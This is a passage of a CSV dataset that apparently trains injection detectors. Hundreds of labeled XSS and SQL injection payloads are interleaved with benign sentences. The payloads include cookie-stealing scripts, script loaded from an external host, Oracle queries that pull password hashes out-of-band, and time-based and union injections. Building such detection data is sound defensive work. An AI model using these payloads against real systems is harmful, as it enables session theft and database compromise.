= 1765 or 8571 = 8571--",2,SQLi,18127 "1' ) union all select null,null--",2,SQLi,20214 <svg><table onload=alert(1)></table>,1,XSS,8809 Select the right direction to follow.,3,normal,24070 <link href=validstyles.css rel=stylesheet onload=alert(1)>,1,XSS,3963 "<data onclick=""alert(1)"">test</data>",1,XSS,8926 [a](j a v a s c r i p t:prompt(document.cookie)),1,XSS,6080 "-9582' ) where 4397 = 4397 union all select 4397,4397,4397#",2,SQLi,17298 "1%' ) ) ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( ( '%' = '",2,SQLi,10980 "In ' FrontPage Editor ', select the tab at the bottom called ' HTML '.",3,normal,26035 "<;SCRIPT SRC="";http://ha.ckers.org/xss.jpg"";>;<;/SCRIPT>;",1,XSS,4008 <custom tags onpointerover=alert(1)>XSS</custom tags>,1,XSS,4941 "Select quickly, please.",3,normal,24460 ",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,18419 <script onload=alert(1) src=validjs.js></script>,1,XSS,5900 "1%' ) ) ) or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ( ( '%' = '",2,SQLi,14389 Where's the best place to capture natural beauty?,3,normal,23826 "select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) +'",2,SQLi,14035 "-7793"" ) ) ) or ( 8459 = 8459 ) *4906 and ( ( ( ""lias"" = ""lias",2,SQLi,16992 "1' ) ) ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and ( ( ( 'gfll' = 'gfll",2,SQLi,11484 "1"" ) ) as xwrq where 4161 = 4161",2,SQLi,20340 "1%"" ) ) ) or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13181 "<style>@keyframes x{}</style><blockquote style=""animation-name:x"" onanimationend=""alert(1)""></blockquote>",1,XSS,1262 )) WAITFOR DELAY '0:0:5'--,2,SQLi,20952 "-9758'+ ( select 'rlcy' where 3691 = 3691 union all select 3691,3691,3691,3691,3691,3691,3691--",2,SQLi,14415 "<style>@keyframes slidein {}</style><datalist style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></datalist>",1,XSS,312 "<style>@keyframes x{}</style><pre style=""animation-name:x"" onanimationend=""alert(1)""></pre>",1,XSS,1718 <marquee id=x tabindex=1 ondeactivate=alert(1)></marquee><input id=y autofocus>,1,XSS,2054 -8410' ) ) ) or 8571 = 8571--,2,SQLi,20698 "<applet oncut=""alert(1)"" contenteditable>test</applet>",1,XSS,4670 "<listing oncut=""alert(1)"" contenteditable>test</listing>",1,XSS,4300 "<iframe src=""javascript:%61%6c%65%72%74%28%31%29""></iframe>",1,XSS,3785 "<div draggable=""true"" contenteditable>drag me</div><small ondragover=alert(1) contenteditable>drop here</small>",1,XSS,1010 <dd id=x tabindex=1 onfocus=alert(1)></dd>,1,XSS,7350 1)) or pg_sleep(__TIME__)--,2,SQLi,20853 1' ) as pogx where 4105 = 4105 and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) --,2,SQLi,10401 "Crate & Barrel: 230% off select dining furniture, 303% off outdoor furniture.",3,normal,26266 \x3c,1,XSS,9881 "1' ) ) ) procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,13183 <option onblur=alert(1) tabindex=1 id=x></option><input autofocus>,1,XSS,2775 "1%"" ) ) ) and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ( ( ( ""%"" = """,2,SQLi,13050 1%' ) ) waitfor delay '0:0:5'--,2,SQLi,20468 "1%' and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and '%' = '",2,SQLi,12972 "-9179"" ) union all select 7144,7144,7144,7144,7144,7144,7144,7144--",2,SQLi,16498 <section id=x tabindex=1 onbeforedeactivate=alert(1)></section><input autofocus>,1,XSS,1989 Where's your SQL background?,3,normal,23391 "<shadow onmouseout=""alert(1)"">test</shadow>",1,XSS,7282 "<;SCRIPT a="";>';>""; SRC="";http://ha.ckers.org/xss.js"";>;<;/SCRIPT>;",1,XSS,2674 1' in boolean mode ) or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --,2,SQLi,16284 <<SCRIPT>alert(�XSS�);//<</SCRIPT>,1,XSS,9178 -2432' ) ) or ( 8459 = 8459 ) *4906 and ( ( 'ejhp' = 'ejhp,2,SQLi,17382 The following options can be used to select whether or not obsolescent item messages are to be output.,3,normal,25444 """,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,19333 "><script+src=https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback=confirm(9)//jQuery1120033838593671435757_1537274810388&_=1537274810389""></script>",1,XSS,251 <span onpointerover=alert(1)>XSS</span>,1,XSS,8188 "<p onkeydown=""alert(1)"" contenteditable>test</p>",1,XSS,5886 1'|| ( select 'lljg' from dual where 7631 = 7631,2,SQLi,18749 Select the perfect gift for a family member.,3,normal,24181 I need to select the right class for my interests.,3,normal,23911 <td id=x tabindex=1 onactivate=alert(1)></td>,1,XSS,6592 "select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( ""%"" = """,2,SQLi,13804 1' where 9544 = 9544,2,SQLi,21861 "<rect fill=""white"" style=""clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);""/>",1,XSS,629 or 1=1 –,2,SQLi,22486 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--",2,SQLi,13296 Select the ideal gift for a friend.,3,normal,24163 <picture id=x tabindex=1 onfocusin=alert(1)></picture>,1,XSS,4767 "{""id"":null,""name"":""Ivysaur""}",3,normal,27084 Up to extra $50 off select HP Products with Doorbuster Discount,3,normal,25205 "-7808"" ) ) as jgkk where 9230 = 9230 or elt ( 1032 = 1032,3623 ) --",2,SQLi,16536 Select spot.,3,normal,24550 Select the tab.,3,normal,22878 1' ) as ihsc where 3978 = 3978,2,SQLi,20592 "1"" ) ) ) or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,13806 "1"" ) ) ) or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( ( ""ddun"" = ""ddun",2,SQLi,12451 <details onpointerout=alert(1)>XSS</details>,1,XSS,6998 cast,3,normal,23191 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))",2,SQLi,18806 "<caption onmouseover=""alert(1)"">test</caption>",1,XSS,6307 "The legislative bodies are the select and common council, elected under the law of 1887; by a three-fifths vote it may pass resolutions or ordinances over the mayor's veto.",3,normal,25421 and a='a,2,SQLi,22480 You have only three options to select.,3,normal,25075 -7561 ) as ilrm where 8828 = 8828 or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --,2,SQLi,12416 "select * from users where id = 1 or "" ( &"" or 1 = 1 -- 1",2,SQLi,17594 Sort the color-coded folders on your desk.,3,normal,22991 "1' ) and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,15496 "1' ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( 'zypa' = 'zypa",2,SQLi,10727 "{""id"":null,""name"":""Milkfish""}",3,normal,27240 1)) or pg_sleep(5)--,2,SQLi,21729 <br onpointerout=alert(1)>XSS</br>,1,XSS,9223 <optgroup id=x tabindex=1 onfocusin=alert(1)></optgroup>,1,XSS,4249 "{""id"":null,""name"":""born""}",3,normal,27017 "1'+ ( select ouhd where 8905 = 8905 and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) ) +'",2,SQLi,11297 <SCRIPT SRC=http://.rocks/.js?< B >,1,XSS,9110 <object data=/ onload=alert(1)>,1,XSS,9500 "1"" ) ) ) union all select null,null,null,null,null,null--",2,SQLi,17504 "1' or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and 'nazb' = 'nazb",2,SQLi,11265 "<style>@keyframes x{}</style><figcaption style=""animation-name:x"" onanimationend=""alert(1)""></figcaption>",1,XSS,1275 "><svg/onload=alert(String.fromCharCode(88,83,83))>",1,XSS,5700 <spacer onpointerup=alert(1)>XSS</spacer>,1,XSS,7681 "1'+ ( select 'jfir' where 7814 = 7814 and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) ) +'",2,SQLi,11012 >alert(1)</script><script/1=',1,XSS,9593 "<select onbeforecopy=""alert(1)"" contenteditable>test</select>",1,XSS,3360 "-4541"" ) ) or make_set ( 4821 = 5233,5233 ) and ( ( ""xfex"" = ""xfex",2,SQLi,16591 WHERE 1=1 AND 1=0#,2,SQLi,22028 right,3,normal,23122 I want to select a book for my collection.,3,normal,23870 "1"" or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,15259 <button onBeforeEditFocus=javascript:alert(1)>,1,XSS,6515 "1"" and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) )",2,SQLi,16103 "<applet oncopy=""alert(1)"" contenteditable>test</applet>",1,XSS,4569 select ( case when ( 1961 = 2048 ) then 1961 else 1961* ( select 1961 from information_schema.character_sets ) end ) #,2,SQLi,13279 "1"" and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric )",2,SQLi,10872 "-5379' ) union all select 4294,4294,4294--",2,SQLi,19271 Can you help me decide where to invest?,3,normal,23760 <menuitem id=x tabindex=1 ondeactivate=alert(1)></menuitem><input id=y autofocus>,1,XSS,1963 <bdo id=x tabindex=1 onbeforeactivate=alert(1)></bdo>,1,XSS,4994 "<ol draggable=""true"" ondragleave=""alert(1)"">test</ol>",1,XSS,4893 "1'|| ( select 'pygt' from dual where 5543 = 5543 union all select null,null,null,null,null,null#",2,SQLi,14354 "{""id"":null,""firstName"":""Jeff"",""lastName"":""Lam Tian Hung"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26919 "<caption onmouseleave=""alert(1)"">test</caption>",1,XSS,6228 Select the right colors for the design.,3,normal,24211 Insert data.,3,normal,23101 "<div draggable=""true"" contenteditable>drag me</div><em ondragover=alert(1) contenteditable>drop here</em>",1,XSS,1253 "<fieldset onkeydown=""alert(1)"" contenteditable>test</fieldset>",1,XSS,3178 "<legend draggable=""true"" ondragleave=""alert(1)"">test</legend>",1,XSS,3361 "<a style=""pointer-events:none;position:absolute;""><a style=""position:absolute;"" onclick=""javascript:alert(1);"">XXX</a></a><a href=""javascript:javascript:alert(1)"">XXX</a>",1,XSS,309 Select the best camera settings for photography.,3,normal,24171 The following guide will run you through the basics so that you can select the right fit and the right type of kayak for your endeavor.,3,normal,25447 Join tables where valid,3,normal,23372 "1' ) where 1804 = 1804 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,12604 Mark & Graham: Up to 503% off select home and outdoor items.,3,normal,25897 I need to decide where to go for a cultural event.,3,normal,23889 "1' ) ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( ( 'rpof' like 'rpof",2,SQLi,12249 "<div draggable=""true"" contenteditable>drag me</div><shadow ondrop=alert(1) contenteditable>drop here</shadow>",1,XSS,1053 "1'+ ( select immd where 7499 = 7499 union all select null,null,null,null,null,null,null,null#",2,SQLi,14543 "1' or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )",2,SQLi,11434 <h1 onpointerout=alert(1)>XSS</h1>,1,XSS,9224 "-9987 ) ) ) or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ( 2114 = 2114",2,SQLi,10258 "<tr onbeforepaste=""alert(1)"" contenteditable>test</tr>",1,XSS,4765 <dt onpointerdown=alert(1)>XSS</dt>,1,XSS,9065 "<link rel=import href=""data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;",1,XSS,1876 ) or ('a'='a,2,SQLi,22281 "1', ( select ( case when ( 1902 = 5536 ) then 1 else 1902* ( select 1902 from master..sysdatabases ) end ) )",2,SQLi,13706 "1%"" ) waitfor delay '0:0:5'--",2,SQLi,20733 Amazon is offering up to 82% off select Twitch Clothing & Accessories.,3,normal,26382 `'><script>\xC2\xA0javascript:alert(537)</script>,1,XSS,5833 Select amuse.,3,normal,24729 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><hgroup id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></hgroup>",1,XSS,193 "1' where 8950 = 8950 or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12925 "1"" and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,13257 "1' ) ) or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( 'dhwt' = 'dhwt",2,SQLi,12653 "<meta draggable=""true"" ondragend=""alert(1)"">test</meta>",1,XSS,4487 <http://onxxx%3D1/,1,XSS,9786 "<mark onbeforepaste=""alert(1)"" contenteditable>test</mark>",1,XSS,3926 "-4513"" ) ) ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( ( ""gytb"" = ""gytb",2,SQLi,9964 "{""id"":null,""name"":""give""}",3,normal,26912 """ or """"^""",2,SQLi,22465 Update the website content.,3,normal,22674 "-1920' ) ) ) union all select 1424,1424,1424,1424,1424,1424,1424,1424,1424,1424#",2,SQLi,15222 "1'+ ( select 'rpbx' where 6748 = 6748 and elt ( 4249 = 4249,7259 ) ) +'",2,SQLi,16085 1' ) or sleep ( 5 ) and ( 'fizk' = 'fizk,2,SQLi,19521 "<select draggable=""true"" ondragenter=""alert(1)"">test</select>",1,XSS,3305 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--",2,SQLi,15573 -2303' ) ) as exyt where 2528 = 2528 or 8571 = 8571--,2,SQLi,18098 "1"" ) where 2496 = 2496",2,SQLi,21463 ( select ( case when ( 4108 = 4108 ) then 1 else 4108* ( select 4108 from information_schema.character_sets ) end ) ),2,SQLi,13328 "1"" where 2221 = 2221 and 5318 = 8398--",2,SQLi,19716 select * from users where id = '1' <@$_ or 1 = 1 -- 1',2,SQLi,17912 "<;META HTTP-EQUIV="";Link""; Content="";<;http://ha.ckers.org/xss.css>;; REL=stylesheet"";>;",1,XSS,1808 "<strong onkeydown=""alert(1)"" contenteditable>test</strong>",1,XSS,3873 "<audio src=1 href=1 onerror=""javascript:alert(1)""></audio>",1,XSS,3793 "See Select Cases from the Coroners' Rolls, 1265-1413, ed.",3,normal,25696 "1 ) where 9012 = 9012 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,14178 "<IMG SRC=x onbeforeunload=""alert(String.fromCharCode(88,83,83))"">",1,XSS,2788 <q onpointerenter=alert(1)>XSS</q>,1,XSS,9262 Modify your hairstyle for the special event.,3,normal,22900 "<style>@keyframes x{}</style><svg style=""animation-name:x"" onanimationend=""alert(1)""></svg>",1,XSS,1719 "<script><img title=""</script><img src onerror=alert(1)>""></script>",1,XSS,2698 "&lt;LAYER SRC=\""http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\""&gt;&lt;/LAYER&gt;",1,XSS,1850 -4001' ) ) or 5634 = 4044--,2,SQLi,20925 "-2131"" or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ""wpsf"" like ""wpsf",2,SQLi,10647 &&SLEEP(5)&&'1,2,SQLi,22201 ( select ( case when ( 9856 = 9856 ) then sleep ( 5 ) else 9856* ( select 9856 from information_schema.character_sets ) end ) ),2,SQLi,12876 <element onpointerover=alert(1)>XSS</element>,1,XSS,6625 "<IMG SRC=x onoffline=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3437 Join fitness class.,3,normal,22777 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11#",2,SQLi,16550 "<img src=x\x12onerror=""javascript:alert(1)"">",1,XSS,6774 Where's the best place to capture memories?,3,normal,23861 "<output onmousedown=""alert(1)"">test</output>",1,XSS,6995 $ ( sleep 50 ),2,SQLi,22204 "1""",2,SQLi,22548 Select your consequence.,3,normal,24883 Where's your SQL advice?,3,normal,23417 "AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( PASSWORD ) FROM ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ ) WHERE LIMIT = 3 ) ) AND 'i' = 'i",2,SQLi,11625 "<style>:target {color:red;}</style><audio id=x style=""transition:color 1s"" ontransitionend=alert(1)></audio>",1,XSS,1119 "<IFRAME width=""420"" height=""315"" frameborder=""0"" onload=""alert(document.cookie)""></IFRAME>",1,XSS,1758 ; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' --,2,SQLi,16905 <button onDataSetChanged=javascript:alert(1)>,1,XSS,6754 "<div draggable=""true"" contenteditable>drag me</div><optgroup ondrop=alert(1) contenteditable>drop here</optgroup>",1,XSS,872 1' in boolean mode ) and 9198 = 9198--,2,SQLi,19765 "<rt onmouseout=""alert(1)"">test</rt>",1,XSS,9107 "<div draggable=""true"" contenteditable>drag me</div><figcaption ondragover=alert(1) contenteditable>drop here</figcaption>",1,XSS,723 "1%' ) ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( '%' = '",2,SQLi,11021 1%' and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #,2,SQLi,17294 1'|| ( select 'qdkb' where 4331 = 4331,2,SQLi,19751 Where's the nearest Starbucks?,3,normal,23510 Select your conclude.,3,normal,25007 <nav onpointerenter=alert(1)>XSS</nav>,1,XSS,8350 "select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) and ( ( ( 'egnv' like 'egnv",2,SQLi,15612 "Select wallpapers will be $211-$227 per panel, and select art prints will be $2200-$3093 each (unframed) and $3083-$3073 each (framed).",3,normal,25575 "1 ) ) ) and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( ( 8382 = 8382",2,SQLi,10962 Create a memorable event.,3,normal,22679 Join the band.,3,normal,22793 "<style>@keyframes slidein {}</style><textarea style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></textarea>",1,XSS,316 "Its most important early charter was that granted in 1340 by Hugh le Despenser, whereby the burgesses acquired the right to nominate persons from whom the constable of the castle should select a bailiff and other officers, two ancient fairs, held on the 29th of June and, 9th of September, were confirmed, and extensive trading privileges were granted, including the right to form a merchant gild.",3,normal,25944 Select a scenic route.,3,normal,22650 Can you help me decide where to go for a jog?,3,normal,23732 1' ) as zdhq where 5586 = 5586,2,SQLi,20614 <!--[if]><script>javascript:alert(1)</script -->,1,XSS,5852 <ins id=x tabindex=1 onactivate=alert(1)></ins>,1,XSS,6131 "<dt onkeypress=""alert(1)"" contenteditable>test</dt>",1,XSS,5449 "<OBJECT TYPE=""text/x-scriptlet"" DATA=""%(scriptlet)s""></OBJECT>",1,XSS,3131 1 where 6523 = 6523 and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --,2,SQLi,16303 "1' ) where 5925 = 5925 union all select null,null,null,null,null,null,null#",2,SQLi,15656 -5089' ) ) as icbb where 1129 = 1129 or 6250 = 9650,2,SQLi,18404 "<div draggable=""true"" contenteditable>drag me</div><button ondragover=alert(1) contenteditable>drop here</button>",1,XSS,912 "<main onbeforepaste=""alert(1)"" contenteditable>test</main>",1,XSS,3970 Insert the new batteries.,3,normal,22737 She'll select soon.,3,normal,24432 "1"" ) ) as exzo where 7518 = 7518 ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) --",2,SQLi,10189 "<style>@keyframes slidein {}</style><bgsound style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></bgsound>",1,XSS,338 Randomly select a winner.,3,normal,24433 you are hence selected to do sth,3,normal,25108 Delete the spam.,3,normal,22850 "<IMG SRC=x onafterprint=""alert(String.fromCharCode(88,83,83))"">",1,XSS,2987 1' ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ),2,SQLi,10902 "select * from users where id = 1 + \+*$ union select null,@@VERSION -- 1",2,SQLi,15940 and WAITFOR DELAY '0:0:5',2,SQLi,21034 "1 ) ) ) or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11693 1' ) union all select null#,2,SQLi,20891 "-5187"" ) union all select 3373,3373#",2,SQLi,19966 "-7001'+ ( select slav where 9321 = 9321 union all select 9321,9321,9321,9321,9321,9321,9321,9321,9321--",2,SQLi,13931 "1' and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and 'ankn' = 'ankn",2,SQLi,11025 "<dt onbeforepaste=""alert(1)"" contenteditable>test</dt>",1,XSS,4822 1 where 6036 = 6036 and 7533 = 7533--,2,SQLi,19824 "-5115"" union all select 1642,1642,1642,1642,1642,1642,1642,1642--",2,SQLi,16715 "1"" ) as idwa where 2545 = 2545 or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12124 -7548 or 2850 = 9666,2,SQLi,21789 "-4145%"" ) ) union all select 9404,9404,9404,9404,9404,9404,9404#",2,SQLi,16756 Save up to 40% on select networking and storage products,3,normal,25715 <legend onpointermove=alert(1)>XSS</legend>,1,XSS,7246 "{""id"":null,""firstName"":""Kok"",""lastName"":""Kin"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27384 "call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) and ( ""nwjv"" = ""nwjv",2,SQLi,14103 -6766' ) ) ) or 3038 = 3038,2,SQLi,20895 "1' or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) and 'yaje' = 'yaje",2,SQLi,11898 "1' ) or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( 'csmu' = 'csmu",2,SQLi,14544 "<img onmouseenter=""alert(1)"">test</img>",1,XSS,8266 1'|| ( select 'blvu' from dual where 9813 = 9813,2,SQLi,18702 "<header onmouseover=""alert(1)"">test</header>",1,XSS,6858 <xmp onpointerdown=alert(1)>XSS</xmp>,1,XSS,8600 atan,3,normal,23222 Select evolve.,3,normal,24779 "<button onmouseover=""alert(1)"">test</button>",1,XSS,6904 1 ) as rlft where 1670 = 1670 waitfor delay '0:0:5'--,2,SQLi,18074 1 ) and 7533 = 7533,2,SQLi,21985 1' ) ) ) and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( ( 'jzpb' = 'jzpb,2,SQLi,9973 "select * from users where id = 1 union select 1||1,version ( ) -- 1",2,SQLi,16460 "<script/src=""data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')""></script a=\u0061 & /=%2F",1,XSS,1447 ) or '1'='1'#,2,SQLi,22219 "1%"" ) or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ""%"" = """,2,SQLi,14845 Create a captivating story.,3,normal,22630 "<style>li {list-style-image: url(""javascript:document.vulnerable=true;"");</STYLE><UL><LI>XSS",1,XSS,1697 "AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( granted_role ) FROM ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER ) WHERE LIMIT = 5 ) ) AND 'i' = 'i",2,SQLi,11108 "-3879' union all select 9814,9814,9814,9814,9814,9814,9814,9814,9814--",2,SQLi,16176 AND 1 = utl_inaddr.get_host_address ( ( SELECT COUNT ( DISTINCT ( USERNAME ) ) FROM SYS.ALL_USERS ) ) AND 'i' = 'i,2,SQLi,13407 "1%' ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( '%' = '",2,SQLi,17982 "-1668"" ) ) ) or 9323 = 9323#",2,SQLi,20817 "<iframe style=""position:absolute;top:0;left:0;width:100%;height:100%"" onmouseover=""prompt(1)"">",1,XSS,1632 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><bdo id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></bdo>",1,XSS,271 "<html onMouseOut html onMouseOut=""javascript:javascript:alert(1)""></html onMouseOut>",1,XSS,1883 "select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) +'",2,SQLi,14547 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26",2,SQLi,13924 "<svg><script href=""data:text/javascript,alert(1)"" />",1,XSS,5076 "&lt;IMG SRC=\""livescript&#058;&#91;code&#93;\""&gt;",1,XSS,5511 "Plus, with Select and Go, you can select the rooms you want to clean.",3,normal,25773 Order a warm latte.,3,normal,22597 <rp id=x tabindex=1 onbeforedeactivate=alert(1)></rp><input autofocus>,1,XSS,2537 "1' ) ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) 